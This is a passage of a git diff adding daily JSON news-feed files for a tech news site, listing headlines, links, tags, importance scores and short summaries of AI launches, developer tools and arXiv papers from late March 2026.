"https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/", + "source": "Ars Technica AI", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7599999999999999, + "date": "2026-03-24T12:38:09.000Z", + "summary": "Development houses: It's time to check your networks for infections.", + "category": "tech_general" + }, + { + "title": "Qite.js – Frontend framework for people who hate React and love HTML", + "url": "https://qitejs.qount25.dev", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7599999999999999, + "date": "2026-03-19T13:49:12.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Nanobrew: The fastest macOS package manager compatible with brew", + "url": "https://nanobrew.trilok.ai/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-24T11:40:21.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "A retro terminal music player inspired by Winamp", + "url": "https://github.com/bjarneo/cliamp", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-23T20:42:22.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Gridland: make terminal apps that also run in the browser", + "url": "https://www.gridland.io/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-24T16:57:47.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Log File Viewer for the Terminal", + "url": "https://lnav.org/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.62, + "date": "2026-03-24T05:32:53.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-25.json b/data/news-feed-2026-03-25.json new file mode 100644 index 0000000..d98f4ec --- /dev/null +++ b/data/news-feed-2026-03-25.json @@ -0,0 +1,115 @@ +{ + "generated": "2026-06-05T00:44:30.352Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-25", + "article_count": 7, + "archived_story_count": 95, + "articles": [ + { + "title": "Google launches Lyria 3 Pro music generation model", + "url": "https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-25T16:37:43.000Z", + "summary": "Google is launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music tools across Gemini, enterprise products, and other services.", + "category": "ai_tools" + }, + { + "title": "Meta launches new initiative to support entrepreneurship, drive AI adoption", + "url": "https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-25T14:45:20.000Z", + "summary": "Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space.", + "category": "ai_tools" + }, + { + "title": "Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’", + "url": "https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.77, + "date": "2026-03-25T20:38:45.000Z", + "summary": "Google’s TurboQuant has the internet joking about Pied Piper from HBO's \"Silicon Valley.\" The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now.", + "category": "ai_tools" + }, + { + "title": "Building a coding agent in Swift from scratch", + "url": "https://github.com/ivan-magda/swift-claude-code", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.7, + "date": "2026-03-25T10:45:40.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: DuckDB community extension for prefiltered HNSW using ACORN-1", + "url": "https://github.com/cigrainger/duckdb-hnsw-acorn", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-25T03:28:04.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Rendering complex scripts in terminal and OSC 66", + "url": "https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-22T09:31:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Open source isn't a tip jar – it's time to charge for access", + "url": "https://www.theregister.com/2026/03/25/open_source_bill_opinion/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-25T11:59:36.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-26.json b/data/news-feed-2026-03-26.json new file mode 100644 index 0000000..9ea7028 --- /dev/null +++ b/data/news-feed-2026-03-26.json @@ -0,0 +1,119 @@ +{ + "generated": "2026-06-05T00:44:30.591Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-26", + "article_count": 7, + "archived_story_count": 95, + "articles": [ + { + "title": "Cohere launches an open source voice model specifically for transcription", + "url": "https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-03-26T13:30:00.000Z", + "summary": "Relatively light at just 2 billion parameters, the model is meant for use with consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages.", + "category": "ai_tools" + }, + { + "title": "Mistral releases a new open source model for speech generation", + "url": "https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/", + "source": "TechCrunch AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-03-26T11:30:00.000Z", + "summary": "The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI.", + "category": "ai_tools" + }, + { + "title": "Intel Announces Arc Pro B70 and Arc Pro B65 GPUs", + "url": "https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9199999999999999, + "date": "2026-03-26T14:36:04.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer", + "url": "https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.78, + "date": "2026-03-26T22:41:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Relay – The open-source Claude Cowork for OpenClaw", + "url": "https://github.com/SeventeenLabs/relay", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.71, + "date": "2026-03-26T10:23:12.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Stripe Projects: Provision and manage services from the CLI", + "url": "https://projects.dev/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-26T16:00:57.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Shell Tricks That Make Life Easier (and Save Your Sanity)", + "url": "https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-26T00:28:38.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-27.json b/data/news-feed-2026-03-27.json new file mode 100644 index 0000000..f1338e9 --- /dev/null +++ b/data/news-feed-2026-03-27.json @@ -0,0 +1,87 @@ +{ + "generated": "2026-06-05T00:44:30.771Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-27", + "article_count": 5, + "archived_story_count": 86, + "articles": [ + { + "title": "Nashville library launches Memory Lab for digitizing home movies", + "url": "https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies", + "source": "Hacker News", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 0.84, + "date": "2026-03-24T04:22:15.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents", + "url": "https://github.com/outworked/outworked/releases/tag/v0.3.0", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.7699999999999999, + "date": "2026-03-27T17:25:05.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Telnyx package compromised on PyPI", + "url": "https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-27T18:13:57.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Telnyx package compromised on PyPI", + "url": "https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-27T08:57:02.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Minimalist library to generate SVG views of scientific data", + "url": "https://github.com/alefore/mini_svg/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-23T17:54:51.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-28.json b/data/news-feed-2026-03-28.json new file mode 100644 index 0000000..aa285c8 --- /dev/null +++ b/data/news-feed-2026-03-28.json @@ -0,0 +1,70 @@ +{ + "generated": "2026-06-05T00:44:30.984Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-28", + "article_count": 4, + "archived_story_count": 67, + "articles": [ + { + "title": "Arm releases first in-house chip, with Meta as debut customer", + "url": "https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9199999999999999, + "date": "2026-03-24T23:34:06.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Improving personal tax filing with Claude CLI and Obsidian", + "url": "https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.73, + "date": "2026-03-28T18:21:52.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Improved Git Diffs with Delta, Fzf and a Little Shell Scripting", + "url": "https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7, + "date": "2026-03-24T15:02:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenCiv1 – open-source rewrite of Civ1", + "url": "https://github.com/rajko-horvat/OpenCiv1", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6799999999999999, + "date": "2026-03-28T18:22:45.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-29.json b/data/news-feed-2026-03-29.json new file mode 100644 index 0000000..b79c584 --- /dev/null +++ b/data/news-feed-2026-03-29.json @@ -0,0 +1,55 @@ +{ + "generated": "2026-06-05T00:44:31.207Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-29", + "article_count": 3, + "archived_story_count": 57, + "articles": [ + { + "title": "Figma's MCP Update Reflects a Larger Industry Shift", + "url": "https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal", + "source": "Hacker News", + "tags": [ + "mcp" + ], + "matching_tags": [ + "mcp" + ], + "importance": 0.8200000000000001, + "date": "2026-03-29T15:46:26.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenYak – An open-source Cowork that runs any model and owns your filesystem", + "url": "https://github.com/openyak/desktop", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.82, + "date": "2026-03-29T04:26:13.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Pretext: TypeScript library for multiline text measurement and layout", + "url": "https://github.com/chenglou/pretext", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7, + "date": "2026-03-28T16:52:45.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-30.json b/data/news-feed-2026-03-30.json new file mode 100644 index 0000000..5e30e14 --- /dev/null +++ b/data/news-feed-2026-03-30.json @@ -0,0 +1,40 @@ +{ + "generated": "2026-06-05T00:44:31.348Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-30", + "article_count": 2, + "archived_story_count": 75, + "articles": [ + { + "title": "There are more AI health tools than ever—but how well do they work?", + "url": "https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/", + "source": "MIT Tech Review AI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.9099999999999999, + "date": "2026-03-30T16:00:00.000Z", + "summary": "Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would…", + "category": "ai_research" + }, + { + "title": "Build123d: A Python CAD programming library", + "url": "https://github.com/gumyr/build123d", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.49, + "date": "2026-03-29T20:58:22.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-03-31.json b/data/news-feed-2026-03-31.json new file mode 100644 index 0000000..80ba701 --- /dev/null +++ b/data/news-feed-2026-03-31.json @@ -0,0 +1,271 @@ +{ + "generated": "2026-06-05T00:44:31.546Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-03-31", + "article_count": 15, + "archived_story_count": 533, + "articles": [ + { + "title": "A Regression Framework for Understanding Prompt Component Impact on LLM Performance", + "url": "https://arxiv.org/abs/2603.26830", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task.", + "category": "ai_research" + }, + { + "title": "LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA", + "url": "https://blog.langchain.com/nvidia-enterprise/", + "source": "LangChain Blog", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-03-16T21:31:28.000Z", + "summary": "Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration", + "category": "ai_agents" + }, + { + "title": "Systematic debugging for AI agents: Introducing the AgentRx framework", + "url": "https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/", + "source": "Microsoft Research Blog", + "tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-03-12T16:38:45.000Z", + "summary": "As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research .", + "category": "ai_research" + }, + { + "title": "Autonomous context compression", + "url": "https://blog.langchain.com/autonomous-context-compression/", + "source": "LangChain Blog", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-03-11T18:24:27.000Z", + "summary": "TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. Older messages are replaced by", + "category": "ai_agents" + }, + { + "title": "Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals", + "url": "https://arxiv.org/abs/2603.26829", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design.", + "category": "ai_research" + }, + { + "title": "A Step Toward Federated Pretraining of Multimodal Large Language Models", + "url": "https://arxiv.org/abs/2603.26786", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines.", + "category": "ai_research" + }, + { + "title": "TED: Training-Free Experience Distillation for Multimodal Reasoning", + "url": "https://arxiv.org/abs/2603.26778", + "source": "ArXiv cs.LG (ML)", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience.", + "category": "ai_research" + }, + { + "title": "EpochX: Building the Infrastructure for an Emergent Agent Civilization", + "url": "https://arxiv.org/abs/2603.27304", + "source": "ArXiv cs.AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration.", + "category": "ai_research" + }, + { + "title": "Bitboard version of Tetris AI", + "url": "https://arxiv.org/abs/2603.26765", + "source": "ArXiv cs.AI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research.", + "category": "ai_research" + }, + { + "title": "Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0", + "url": "https://www.together.ai/blog/nvidia-nemotron-3-super", + "source": "Together AI Blog", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-03-11T00:00:00.000Z", + "summary": "NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure.", + "category": "ai_tools" + }, + { + "title": "Together Evaluations now supports comparing top commercial APIs vs. open source models", + "url": "https://www.together.ai/blog/together-evaluations-v2", + "source": "Together AI Blog", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-02-02T00:00:00.000Z", + "summary": "Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform.", + "category": "ai_tools" + }, + { + "title": "Introducing deploy cli", + "url": "https://blog.langchain.com/introducing-deploy-cli/", + "source": "LangChain Blog", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.69, + "date": "2026-03-16T17:20:21.000Z", + "summary": "We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in", + "category": "ai_agents" + }, + { + "title": "Introducing LangSmith Sandboxes: Secure Code Execution for Agents", + "url": "https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/", + "source": "LangChain Blog", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-03-17T15:51:07.000Z", + "summary": "Spin up a sandbox in a single line of code with the LangSmith SDK. Now in Private Preview.", + "category": "ai_agents" + }, + { + "title": "Open SWE: An Open-Source Framework for Internal Coding Agents", + "url": "https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/", + "source": "LangChain Blog", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-03-17T15:30:00.000Z", + "summary": "Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents.", + "category": "ai_agents" + }, + { + "title": "Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups", + "url": "https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-31T14:00:00.000Z", + "summary": "Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-01.json b/data/news-feed-2026-04-01.json new file mode 100644 index 0000000..3d3bdd2 --- /dev/null +++ b/data/news-feed-2026-04-01.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:31.735Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-01", + "article_count": 15, + "archived_story_count": 894, + "articles": [ + { + "title": "MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding", + "url": "https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/", + "source": "MarkTechPost", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.743Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP", + "url": "https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/", + "source": "MarkTechPost", + "tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.720Z", + 